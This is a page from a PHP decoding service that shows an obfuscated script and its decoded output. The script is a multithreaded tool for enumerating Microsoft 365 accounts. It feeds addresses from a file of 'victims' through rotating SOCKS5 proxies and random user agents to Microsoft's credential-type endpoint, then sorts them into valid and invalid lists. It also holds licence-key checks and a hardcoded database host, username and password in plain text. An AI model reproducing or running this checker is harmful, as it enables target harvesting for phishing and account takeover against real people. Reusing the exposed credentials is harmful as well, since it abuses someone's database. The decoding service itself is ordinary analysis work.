Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto ZisCE; Ga242: error_reporting(0); goto UDgV_; LJVP_: try { $pdo = new PDO("..

Decoded Output download

<?php 
 
 goto ZisCE; Ga242: error_reporting(0); goto UDgV_; LJVP_: try { $pdo = new PDO("mysql:host=sql196.main-hosting.eu;dbname=u653744347_maile;charset=utf8", "u653744347_redru", "kGAl0DUeqzs5"); $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); } catch (PDOException $e) { goto V61qB; V61qB: echo "Connection to database failed:"; goto DeEFA; DeEFA: echo "\xd
"; goto XZWtc; XZWtc: exit; goto ksf0X; ksf0X: } goto lZfxg; Om2Hn: echo "\xd
"; goto r5yTd; swpov: goto pQTrf; goto w0Q61; TxVB3: if ($getKey->rowCount() <= 0) { goto Z1UqO; PcCMG: echo "\xd\xa"; goto O3SUC; Z1UqO: echo "Your key is invalid!\xa"; goto PcCMG; O3SUC: exit; goto Oc5Y7; Oc5Y7: } elseif ($userKey["banned"] == 1) { goto Lhau1; nEBxF: exit; goto kd9ge; lYesy: echo "\x1b[0m"; goto nEBxF; B_ilp: echo "YOU HAVE BEEN BANNED! REASON: " . $userKey["ban_reason"] . "
"; goto lYesy; Lhau1: echo "\x1b[1;91m"; goto B_ilp; kd9ge: } else { $UUID = getHwid(); if ($userKey[3] == 0) { goto TPTma; f7YpA: $setKey->bindParam(":PCNAME", $pcname); goto DYz9D; TPTma: $pcname = php_uname("n"); goto a0Vjc; C2g4x: $setKey->bindParam(":UserKey", $userKey[2]); goto MCI6w; DYz9D: $setKey->bindParam(":UUID", $UUID); goto C2g4x; a0Vjc: $setKey = $pdo->prepare("UPDATE users SET Activated=1, UUID=:UUID, PCNAME=:PCNAME WHERE UserKey=:UserKey"); goto f7YpA; W_Hsa: echo "\x1b[36;1m"; goto k6zpc; MCI6w: $setKey->execute(); goto W_Hsa; k6zpc: } elseif ($UUID != $userKey[4] && $userKey[6] != 1) { goto br1i5; w2n2V: exit; goto Rzf_2; SwF_Y: echo "\33[0m"; goto w2n2V; br1i5: $banReason = "ACCOUNT SHARING"; goto zQJZ4; zQJZ4: $ban = $pdo->prepare("UPDATE users SET banned=1, ban_reason=:ban_reason WHERE UserKey=:UserKey"); goto prguW; prguW: $ban->bindParam(":ban_reason", $banReason); goto mtEbc; XXG9N: echo "\33[1;91m"; goto inlOB; D1rd_: $ban->execute(); goto XXG9N; mtEbc: $ban->bindParam(":UserKey", $userKey[2]); goto D1rd_; inlOB: echo "Key has already been activated on another pc\xa"; goto SwF_Y; Rzf_2: } elseif ($userKey[6] == 1) { goto f4_t9; yPSg1: $getUUID = explode(",", $checkUUIDs); goto Mtwtb; f4_t9: $checkUUIDs = $userKey[7]; goto yPSg1; Mtwtb: $insertNew = $UUID . ","; goto FoMxW; FoMxW: if ($UUID != $userKey[4] && !in_array($UUID, $getUUID)) { goto YlUpA; gUPGT: $updatePc->bindParam(":UserKey", $userKey[2]); goto gwlU4; YlUpA: if ($userKey[8] >= 1) { goto yHpkt; Cj08K: echo "\x1b[0m "; goto Mg3Oo; yHpkt: echo "Max devices reached!
"; goto Cj08K; Mg3Oo: exit; goto vtGWP; vtGWP: } goto BA6H7; BA6H7: $setKey = $pdo->prepare("UPDATE users SET PCs = concat(PCs, :PCs) WHERE UserKey=:UserKey"); goto A5Xpp; gwlU4: $updatePc->execute(); goto kPAnK; CK2We: $setKey->execute(); goto y5bh1; y5bh1: $updatePc = $pdo->prepare("UPDATE users SET PCcount=PCcount+1 WHERE UserKey=:UserKey"); goto gUPGT; kNV63: $setKey->bindParam(":UserKey", $userKey[2]); goto CK2We; A5Xpp: $setKey->bindParam(":PCs", $insertNew); goto kNV63; kPAnK: } goto juOy1; juOy1: } } goto WYoTL; I5O0q: $files = file("list.txt"); goto pSKUa; zUXlC: pQTrf: goto p5PCD; p5PCD: if (feof($file)) { goto G4FLV; } goto c_psz; pSKUa: $victims = 0; goto zUXlC; sQcNc: $getOS = PHP_OS; goto LJVP_; WYoTL: class Request extends Threaded { public $recipent; public function __construct($recipent) { $this->recipent = $recipent; } public function run() { goto E0t4B; CmWj3: $f_userAgent = file("randomUA.txt"); goto prTe0; bDDir: if ($var) { curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $var); } goto Ju8fH; ltiRw: $url = "https://login.microsoftonline.com/common/GetCredentialType?mkt=en-US"; goto y49u_; q7G9p: if (strpos($test_true, "fExistsResult":6") || strpos($test_true, "fExistsResult":0")) { if (strpos($test_true, "BannerLogo")) { goto Ewsjb; TeLPo: $file = fopen("Results/OFFICE-ORG.txt", "a"); goto MmTXP; Ewsjb: echo "\33[95m \xd\xa"; goto DJrpQ; MmTXP: fwrite($file, $recipent . "
\xa"); goto Ow8EI; Ow8EI: fclose($file); goto lYRC0; DJrpQ: echo "VALID OFFICE ORG ==> " . $recipent . ''; goto TeLPo; lYRC0: } else { goto W4hOx; BMaO7: $file = fopen("Results/VALID-OFFICE.txt", "a"); goto s3rXF; uM5qU: fclose($file); goto kxiXT; exCqo: echo "VALID OFFICE ==> " . $recipent . ''; goto BMaO7; s3rXF: fwrite($file, $recipent . "
"); goto uM5qU; W4hOx: echo "\33[92m \xd
"; goto exCqo; kxiXT: } } else { goto pX0nP; Gl0q7: echo "INVALID ==> " . $recipent . ''; goto uVDe7; WleQJ: fwrite($file, $recipent . "\xd
"); goto dzdMW; uVDe7: $file = fopen("Results/INVALID.txt", "a"); goto WleQJ; dzdMW: fclose($file); goto dvJgW; pX0nP: echo "\33[1;91m \xd
"; goto Gl0q7; dvJgW: } goto kbx1T; MvaJD: curl_setopt($curl, CURLOPT_TIMEOUT, 10); goto HwfOV; E0t4B: $recipent = $this->recipent; goto Alhvb; Rxtkl: $result = curl_exec($curl); goto ZXLsP; Alhvb: $recipent = trim($recipent); goto CmWj3; ig3Iv: include "log.php"; goto UHk_R; BBOyf: $Randomprox = trim($prox); goto ltiRw; f1FcG: $RandomUA = trim($UserAgents); goto uB8Oo; wcsLP: curl_setopt($curl, CURLOPT_PROXY, $Randomprox); goto b_DFO; prTe0: $UserAgents = $f_userAgent[array_rand($f_userAgent)]; goto f1FcG; ACbC9: $prox = $f_prox[array_rand($f_prox)]; goto BBOyf; RCNXM: curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 2); goto Gv0eK; HBcaJ: curl_setopt($curl, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5); goto vdwu6; QASnC: $var = "{"username":"" . $prefix . "","isOtherIdpSupported":true,"checkPhones":true,"isRemoteNGCSupported":true,"isCookieBannerShown":false,"isFidoSupported":false}"; goto qN45Q; HwfOV: curl_setopt($curl, CURLOPT_USERAGENT, $RandomUA); goto bDDir; b_DFO: curl_setopt($curl, CURLOPT_PROXYUSERPWD, "{$user}:{$pass}"); goto HBcaJ; QlCBG: curl_setopt($curl, CURLOPT_NOBODY, $header); goto P24Kw; Gv0eK: curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); goto jbVxp; uB8Oo: $f_prox = file("prox.txt"); goto ACbC9; dGcRB: $nobody = false; goto I2ol5; P24Kw: curl_setopt($curl, CURLOPT_HEADER, $nobody); goto MvaJD; UHk_R: $curl = curl_init($url); goto wcsLP; y49u_: if (strpos($recipent, ":")) { $prefix = substr($recipent, 0, strrpos($recipent, ":")); } else { $prefix = $recipent; } goto QASnC; vdwu6: curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20); goto QlCBG; jbVxp: curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); goto Rxtkl; qN45Q: $header = false; goto dGcRB; I2ol5: $csrf = ''; goto ig3Iv; Ju8fH: curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); goto RCNXM; oglkt: $test_true = $result; goto q7G9p; ZXLsP: curl_close($curl); goto oglkt; kbx1T: } function curl($url = '', $var = '', $header = false, $nobody = false, $csrf = '') { } } goto PpmyZ; zhDo4: function getKeyLinux($salt = '') { $uniqueKey = shell_exec("sudo dmidecode -t 4 | grep ID | sed 's/.*ID://;s/ //g'"); return trim(md5($salt . md5($output))); } goto LMN_p; RbsCu: foreach ($files as $test) { $pool->submit(new Request($test)); sLcOf: } goto aADWl; PpmyZ: $file = fopen("list.txt", "r"); goto I5O0q; syVAV: echo "\33[36;1m
"; goto zAKTX; aADWl: lvyLc: goto VOoIb; LMN_p: $getKey = $pdo->prepare("SELECT * FROM users WHERE UserKey=:UserKey"); goto jeh4Y; SdJHm: echo "
\xa"; goto Cz7ij; lZfxg: function getHwid($salt = '') { goto b9VAS; j30oC: return trim(md5($salt . md5($rest))); goto dgKh5; b9VAS: $output = shell_exec("wmic csproduct get uuid"); goto vc0R_; vc0R_: $rest = str_replace("UUID", '', $output); goto j30oC; dgKh5: } goto zhDo4; nbIr3: if (empty($config["AUTHKEY"])) { echo "Put your key in config.php
"; exit; } goto TxVB3; x6CTU: if ($settings["THREADS"] > 0) { $pool = new Pool($settings["THREADS"]); } else { $pool = new Pool(0); } goto RbsCu; VOoIb: $pool->shutdown(); goto Om2Hn; UDgV_: include "log.php"; goto sQcNc; ZisCE: $settings["THREADS"] = 10; goto Ga242; c_psz: $victims++; goto PlF1k; Cz7ij: echo "\xd\xa"; goto L1SPG; r5yTd: echo "\33[92mDONE!"; goto SdJHm; PlF1k: $recipentsss = fgets($file); goto swpov; aLBNN: echo "\xd
"; goto x6CTU; zAKTX: echo "Loaded: \33[1;93m{$victims}\33[36;1m"; goto aLBNN; w0Q61: G4FLV: goto O2HAL; O2HAL: if (empty($files)) { goto GVXhz; aZ_ww: echo "\33[0m"; goto quTWZ; GVXhz: echo "\x1b[1;91m LIST EMPTY\xa"; goto aZ_ww; quTWZ: exit; goto I0c0e; I0c0e: } goto syVAV; nOvWq: $userKey = $getKey->fetch(); goto nbIr3; jeh4Y: $getKey->bindParam(":UserKey", $config["AUTHKEY"]); goto joE9R; joE9R: $getKey->execute(); goto nOvWq; L1SPG: echo "\33[0m"; ?>

Did this file decode correctly?

Original Code

<?php

 goto ZisCE; Ga242: error_reporting(0); goto UDgV_; LJVP_: try { $pdo = new PDO("\x6d\171\x73\x71\154\72\150\x6f\163\164\75\x73\x71\x6c\61\71\66\x2e\155\141\151\156\55\x68\157\x73\x74\x69\156\x67\56\145\165\73\144\x62\156\x61\x6d\x65\75\x75\x36\x35\x33\67\64\x34\63\64\x37\137\x6d\141\x69\154\x65\73\143\150\x61\x72\x73\145\x74\75\165\164\x66\70", "\165\66\65\63\x37\64\x34\x33\x34\67\x5f\162\145\x64\x72\x75", "\153\x47\101\x6c\60\104\x55\145\x71\172\x73\65"); $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); } catch (PDOException $e) { goto V61qB; V61qB: echo "\103\x6f\x6e\156\145\x63\164\151\x6f\156\x20\164\157\x20\x64\x61\x74\x61\x62\x61\163\x65\x20\146\x61\151\x6c\x65\144\72"; goto DeEFA; DeEFA: echo "\xd\12"; goto XZWtc; XZWtc: exit; goto ksf0X; ksf0X: } goto lZfxg; Om2Hn: echo "\xd\12"; goto r5yTd; swpov: goto pQTrf; goto w0Q61; TxVB3: if ($getKey->rowCount() <= 0) { goto Z1UqO; PcCMG: echo "\xd\xa"; goto O3SUC; Z1UqO: echo "\131\157\x75\x72\x20\153\x65\x79\40\x69\163\40\x69\x6e\x76\x61\x6c\151\144\x21\xa"; goto PcCMG; O3SUC: exit; goto Oc5Y7; Oc5Y7: } elseif ($userKey["\x62\x61\x6e\156\145\x64"] == 1) { goto Lhau1; nEBxF: exit; goto kd9ge; lYesy: echo "\x1b\133\60\155"; goto nEBxF; B_ilp: echo "\131\x4f\125\40\x48\x41\126\105\x20\x42\105\105\116\40\x42\101\116\x4e\105\104\41\40\122\105\x41\123\117\x4e\72\x20" . $userKey["\x62\141\x6e\137\162\x65\141\x73\157\156"] . "\12"; goto lYesy; Lhau1: echo "\x1b\x5b\x31\73\x39\61\x6d"; goto B_ilp; kd9ge: } else { $UUID = getHwid(); if ($userKey[3] == 0) { goto TPTma; f7YpA: $setKey->bindParam("\72\120\x43\x4e\101\115\x45", $pcname); goto DYz9D; TPTma: $pcname = php_uname("\156"); goto a0Vjc; C2g4x: $setKey->bindParam("\72\x55\x73\x65\x72\113\x65\x79", $userKey[2]); goto MCI6w; DYz9D: $setKey->bindParam("\72\x55\x55\x49\x44", $UUID); goto C2g4x; a0Vjc: $setKey = $pdo->prepare("\x55\x50\104\x41\x54\x45\x20\165\163\x65\x72\x73\x20\x53\x45\124\x20\101\143\164\x69\166\x61\164\x65\144\x3d\x31\x2c\x20\x55\x55\111\104\x3d\72\x55\x55\111\104\x2c\40\x50\103\x4e\x41\115\105\75\x3a\120\x43\116\101\x4d\105\x20\x57\110\x45\x52\105\40\x55\x73\145\162\x4b\145\171\x3d\72\x55\x73\x65\162\x4b\145\171"); goto f7YpA; W_Hsa: echo "\x1b\x5b\x33\x36\x3b\61\155"; goto k6zpc; MCI6w: $setKey->execute(); goto W_Hsa; k6zpc: } elseif ($UUID != $userKey[4] && $userKey[6] != 1) { goto br1i5; w2n2V: exit; goto Rzf_2; SwF_Y: echo "\33\x5b\x30\x6d"; goto w2n2V; br1i5: $banReason = "\x41\103\x43\x4f\x55\x4e\124\x20\x53\x48\101\122\x49\x4e\x47"; goto zQJZ4; zQJZ4: $ban = $pdo->prepare("\x55\120\104\101\124\105\40\165\x73\x65\x72\x73\x20\123\105\124\x20\x62\x61\x6e\156\145\144\75\61\x2c\x20\x62\x61\156\137\x72\145\141\x73\x6f\156\75\x3a\x62\141\156\137\162\145\141\x73\157\x6e\x20\x57\x48\x45\122\105\40\x55\x73\x65\162\x4b\x65\x79\x3d\72\125\x73\145\x72\x4b\x65\x79"); goto prguW; prguW: $ban->bindParam("\x3a\142\x61\x6e\137\162\x65\141\x73\x6f\x6e", $banReason); goto mtEbc; XXG9N: echo "\33\133\x31\73\71\61\x6d"; goto inlOB; D1rd_: $ban->execute(); goto XXG9N; mtEbc: $ban->bindParam("\x3a\125\x73\145\162\x4b\145\171", $userKey[2]); goto D1rd_; inlOB: echo "\113\145\x79\x20\x68\141\x73\40\x61\x6c\x72\x65\x61\x64\171\40\x62\x65\x65\x6e\x20\141\143\x74\151\166\141\164\145\x64\x20\157\156\x20\141\x6e\157\x74\x68\145\x72\40\160\x63\xa"; goto SwF_Y; Rzf_2: } elseif ($userKey[6] == 1) { goto f4_t9; yPSg1: $getUUID = explode("\x2c", $checkUUIDs); goto Mtwtb; f4_t9: $checkUUIDs = $userKey[7]; goto yPSg1; Mtwtb: $insertNew = $UUID . "\x2c"; goto FoMxW; FoMxW: if ($UUID != $userKey[4] && !in_array($UUID, $getUUID)) { goto YlUpA; gUPGT: $updatePc->bindParam("\72\x55\x73\145\162\x4b\145\171", $userKey[2]); goto gwlU4; YlUpA: if ($userKey[8] >= 1) { goto yHpkt; Cj08K: echo "\x1b\x5b\60\x6d\x20"; goto Mg3Oo; yHpkt: echo "\x4d\141\170\x20\x64\x65\x76\x69\143\x65\x73\x20\x72\x65\141\143\x68\145\x64\x21\12"; goto Cj08K; Mg3Oo: exit; goto vtGWP; vtGWP: } goto BA6H7; BA6H7: $setKey = $pdo->prepare("\x55\120\104\101\124\105\x20\165\163\x65\162\x73\40\x53\x45\x54\40\x50\103\x73\40\75\x20\143\x6f\x6e\x63\x61\164\x28\120\103\x73\x2c\x20\x3a\120\103\x73\x29\40\x57\x48\x45\x52\105\x20\x55\x73\x65\162\113\x65\x79\75\x3a\x55\x73\145\162\113\x65\x79"); goto A5Xpp; gwlU4: $updatePc->execute(); goto kPAnK; CK2We: $setKey->execute(); goto y5bh1; y5bh1: $updatePc = $pdo->prepare("\125\120\104\101\x54\x45\40\x75\x73\145\162\x73\x20\123\105\124\40\120\x43\143\157\165\x6e\x74\x3d\x50\103\143\157\165\156\x74\x2b\61\x20\127\x48\x45\x52\x45\x20\125\163\145\162\x4b\145\x79\75\72\125\x73\145\x72\x4b\145\x79"); goto gUPGT; kNV63: $setKey->bindParam("\72\125\x73\145\x72\x4b\145\171", $userKey[2]); goto CK2We; A5Xpp: $setKey->bindParam("\72\x50\x43\163", $insertNew); goto kNV63; kPAnK: } goto juOy1; juOy1: } } goto WYoTL; I5O0q: $files = file("\x6c\x69\163\164\56\x74\170\164"); goto pSKUa; zUXlC: pQTrf: goto p5PCD; p5PCD: if (feof($file)) { goto G4FLV; } goto c_psz; pSKUa: $victims = 0; goto zUXlC; sQcNc: $getOS = PHP_OS; goto LJVP_; WYoTL: class Request extends Threaded { public $recipent; public function __construct($recipent) { $this->recipent = $recipent; } public function run() { goto E0t4B; CmWj3: $f_userAgent = file("\x72\141\156\144\x6f\155\x55\101\56\164\170\164"); goto prTe0; bDDir: if ($var) { curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $var); } goto Ju8fH; ltiRw: $url = "\150\x74\164\x70\x73\x3a\57\57\x6c\x6f\x67\151\156\x2e\155\x69\143\x72\x6f\163\157\x66\x74\x6f\156\x6c\x69\156\x65\56\143\157\x6d\x2f\x63\157\155\x6d\157\x6e\57\x47\x65\x74\x43\162\145\144\145\156\164\151\141\x6c\x54\171\160\145\77\x6d\x6b\x74\x3d\x65\156\55\x55\123"; goto y49u_; q7G9p: if (strpos($test_true, "\146\x45\x78\151\x73\164\x73\x52\145\163\165\x6c\x74\42\72\66") || strpos($test_true, "\146\x45\170\151\x73\x74\x73\x52\x65\x73\x75\154\x74\42\x3a\x30")) { if (strpos($test_true, "\102\141\x6e\x6e\x65\162\114\x6f\147\157")) { goto Ewsjb; TeLPo: $file = fopen("\122\145\163\x75\x6c\x74\x73\x2f\117\x46\106\111\103\105\55\117\x52\107\x2e\164\x78\x74", "\141"); goto MmTXP; Ewsjb: echo "\33\x5b\x39\65\155\40\xd\xa"; goto DJrpQ; MmTXP: fwrite($file, $recipent . "\15\xa"); goto Ow8EI; Ow8EI: fclose($file); goto lYRC0; DJrpQ: echo "\x56\x41\x4c\111\104\40\117\x46\106\x49\103\105\40\117\122\107\x20\75\75\x3e\x20" . $recipent . ''; goto TeLPo; lYRC0: } else { goto W4hOx; BMaO7: $file = fopen("\122\145\163\x75\154\164\x73\x2f\x56\x41\114\111\x44\55\117\x46\106\111\x43\x45\x2e\164\x78\x74", "\x61"); goto s3rXF; uM5qU: fclose($file); goto kxiXT; exCqo: echo "\126\101\114\x49\x44\x20\117\x46\106\111\x43\x45\x20\x3d\x3d\x3e\x20" . $recipent . ''; goto BMaO7; s3rXF: fwrite($file, $recipent . "\15\12"); goto uM5qU; W4hOx: echo "\33\x5b\71\x32\155\x20\xd\12"; goto exCqo; kxiXT: } } else { goto pX0nP; Gl0q7: echo "\x49\116\x56\101\x4c\111\104\x20\75\75\76\40" . $recipent . ''; goto uVDe7; WleQJ: fwrite($file, $recipent . "\xd\12"); goto dzdMW; uVDe7: $file = fopen("\x52\x65\163\165\154\x74\x73\x2f\111\x4e\x56\x41\x4c\111\x44\56\164\170\x74", "\x61"); goto WleQJ; dzdMW: fclose($file); goto dvJgW; pX0nP: echo "\33\133\x31\73\x39\61\x6d\x20\xd\12"; goto Gl0q7; dvJgW: } goto kbx1T; MvaJD: curl_setopt($curl, CURLOPT_TIMEOUT, 10); goto HwfOV; E0t4B: $recipent = $this->recipent; goto Alhvb; Rxtkl: $result = curl_exec($curl); goto ZXLsP; Alhvb: $recipent = trim($recipent); goto CmWj3; ig3Iv: include "\x6c\157\x67\x2e\x70\150\x70"; goto UHk_R; BBOyf: $Randomprox = trim($prox); goto ltiRw; f1FcG: $RandomUA = trim($UserAgents); goto uB8Oo; wcsLP: curl_setopt($curl, CURLOPT_PROXY, $Randomprox); goto b_DFO; prTe0: $UserAgents = $f_userAgent[array_rand($f_userAgent)]; goto f1FcG; ACbC9: $prox = $f_prox[array_rand($f_prox)]; goto BBOyf; RCNXM: curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 2); goto Gv0eK; HBcaJ: curl_setopt($curl, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5); goto vdwu6; QASnC: $var = "\x7b\42\x75\x73\x65\162\x6e\141\155\145\42\72\x22" . $prefix . "\42\54\x22\x69\163\x4f\x74\x68\x65\x72\111\x64\x70\x53\165\x70\160\x6f\162\164\x65\144\42\72\x74\x72\165\x65\x2c\x22\x63\150\x65\x63\x6b\120\x68\157\x6e\x65\163\42\72\164\x72\x75\145\x2c\42\x69\x73\122\145\155\x6f\164\x65\x4e\x47\x43\123\165\x70\160\157\x72\164\x65\144\42\72\164\x72\165\x65\x2c\42\151\163\x43\157\157\153\x69\x65\x42\x61\x6e\x6e\145\162\x53\150\x6f\x77\x6e\42\72\146\x61\x6c\163\145\54\x22\x69\163\x46\x69\x64\157\123\165\x70\160\x6f\162\164\145\x64\42\72\x66\141\154\163\145\x7d"; goto qN45Q; HwfOV: curl_setopt($curl, CURLOPT_USERAGENT, $RandomUA); goto bDDir; b_DFO: curl_setopt($curl, CURLOPT_PROXYUSERPWD, "{$user}\x3a{$pass}"); goto HBcaJ; QlCBG: curl_setopt($curl, CURLOPT_NOBODY, $header); goto P24Kw; Gv0eK: curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); goto jbVxp; uB8Oo: $f_prox = file("\160\x72\157\x78\56\164\x78\164"); goto ACbC9; dGcRB: $nobody = false; goto I2ol5; P24Kw: curl_setopt($curl, CURLOPT_HEADER, $nobody); goto MvaJD; UHk_R: $curl = curl_init($url); goto wcsLP; y49u_: if (strpos($recipent, "\x3a")) { $prefix = substr($recipent, 0, strrpos($recipent, "\x3a")); } else { $prefix = $recipent; } goto QASnC; vdwu6: curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20); goto QlCBG; jbVxp: curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); goto Rxtkl; qN45Q: $header = false; goto dGcRB; I2ol5: $csrf = ''; goto ig3Iv; Ju8fH: curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); goto RCNXM; oglkt: $test_true = $result; goto q7G9p; ZXLsP: curl_close($curl); goto oglkt; kbx1T: } function curl($url = '', $var = '', $header = false, $nobody = false, $csrf = '') { } } goto PpmyZ; zhDo4: function getKeyLinux($salt = '') { $uniqueKey = shell_exec("\163\x75\144\x6f\x20\x64\x6d\151\x64\x65\143\x6f\x64\x65\40\55\x74\40\64\x20\174\40\x67\x72\x65\160\40\x49\x44\40\174\x20\x73\145\144\40\x27\163\x2f\x2e\x2a\111\x44\x3a\57\57\x3b\x73\x2f\40\57\57\x67\47"); return trim(md5($salt . md5($output))); } goto LMN_p; RbsCu: foreach ($files as $test) { $pool->submit(new Request($test)); sLcOf: } goto aADWl; PpmyZ: $file = fopen("\154\x69\163\164\x2e\164\170\164", "\x72"); goto I5O0q; syVAV: echo "\33\x5b\x33\66\73\x31\155\15\12"; goto zAKTX; aADWl: lvyLc: goto VOoIb; LMN_p: $getKey = $pdo->prepare("\123\x45\x4c\x45\103\124\x20\x2a\x20\x46\122\117\x4d\40\165\163\x65\162\163\40\127\110\x45\122\x45\x20\125\163\x65\162\113\145\171\75\72\125\x73\x65\162\x4b\x65\171"); goto jeh4Y; SdJHm: echo "\15\xa"; goto Cz7ij; lZfxg: function getHwid($salt = '') { goto b9VAS; j30oC: return trim(md5($salt . md5($rest))); goto dgKh5; b9VAS: $output = shell_exec("\x77\x6d\x69\x63\40\x63\x73\160\x72\x6f\x64\165\x63\164\x20\147\x65\x74\40\x75\165\x69\x64"); goto vc0R_; vc0R_: $rest = str_replace("\x55\125\x49\x44", '', $output); goto j30oC; dgKh5: } goto zhDo4; nbIr3: if (empty($config["\x41\x55\x54\x48\x4b\x45\x59"])) { echo "\120\x75\164\40\x79\157\x75\162\40\x6b\145\x79\x20\151\156\x20\143\x6f\x6e\x66\151\x67\56\160\x68\160\12"; exit; } goto TxVB3; x6CTU: if ($settings["\124\x48\x52\x45\x41\104\x53"] > 0) { $pool = new Pool($settings["\124\110\122\105\x41\104\x53"]); } else { $pool = new Pool(0); } goto RbsCu; VOoIb: $pool->shutdown(); goto Om2Hn; UDgV_: include "\x6c\157\x67\56\160\x68\160"; goto sQcNc; ZisCE: $settings["\124\x48\x52\x45\x41\x44\x53"] = 10; goto Ga242; c_psz: $victims++; goto PlF1k; Cz7ij: echo "\xd\xa"; goto L1SPG; r5yTd: echo "\33\133\x39\62\x6d\104\x4f\116\x45\41"; goto SdJHm; PlF1k: $recipentsss = fgets($file); goto swpov; aLBNN: echo "\xd\12"; goto x6CTU; zAKTX: echo "\x4c\x6f\x61\x64\x65\x64\x3a\40\33\133\x31\x3b\71\x33\x6d{$victims}\33\133\x33\66\x3b\61\155"; goto aLBNN; w0Q61: G4FLV: goto O2HAL; O2HAL: if (empty($files)) { goto GVXhz; aZ_ww: echo "\33\133\x30\x6d"; goto quTWZ; GVXhz: echo "\x1b\x5b\61\x3b\71\x31\x6d\40\x4c\111\x53\x54\x20\x45\x4d\x50\124\131\xa"; goto aZ_ww; quTWZ: exit; goto I0c0e; I0c0e: } goto syVAV; nOvWq: $userKey = $getKey->fetch(); goto nbIr3; jeh4Y: $getKey->bindParam("\72\125\163\x65\x72\113\x65\x79", $config["\101\125\x54\x48\x4b\x45\x59"]); goto joE9R; joE9R: $getKey->execute(); goto nOvWq; L1SPG: echo "\33\133\x30\x6d";

Function Calls

None

Variables

None

Stats

MD5 00f865ce494dd935a7fbacabaab6cea5
Eval Count 0
Decode Time 93 ms